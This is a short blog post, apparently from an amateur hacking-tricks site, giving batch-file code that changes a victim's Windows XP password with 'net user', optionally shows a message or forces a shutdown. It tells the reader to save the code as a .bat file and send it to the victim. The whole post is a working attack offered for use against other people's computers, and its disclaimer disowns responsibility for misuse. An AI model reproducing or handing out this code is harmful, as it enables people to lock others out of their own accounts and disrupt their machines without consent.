Note:

Guys and all the beauties visiting my Blog plz take a note that I cannot be held responsible for any misuse or mishandling of any tricks or virus codes.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
6:39 AM

Windows XP Account Hacking

Posted by JAsh

Change Some1 PC Password With Batch:
This Trick Is On Sending Your Victim A Batch File And It Will Change There Windows Password!

Ok 1st.. Open Notepad Type One Of The Following..
(Choices On What Will Happen To The Victim's Computer)
........................................

.........................................................
Choices :
.................................................................................................
Code with personal message:

@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL

.................................................................................................

Code without personal message:

@net user %USERNAME% (The new password) > NUL

.................................................................................................

Code with shutdown command (Shutdown's victims PC after execute):

@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0

.................................................................................................

[The Dots Are To Seperate The Methods!]

Ok Now Go To File , Save As , Anything.bat And Then Send It To Your Victim And There Password Will Change To Whatever You Like!

Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0

0 comments:

Post a Comment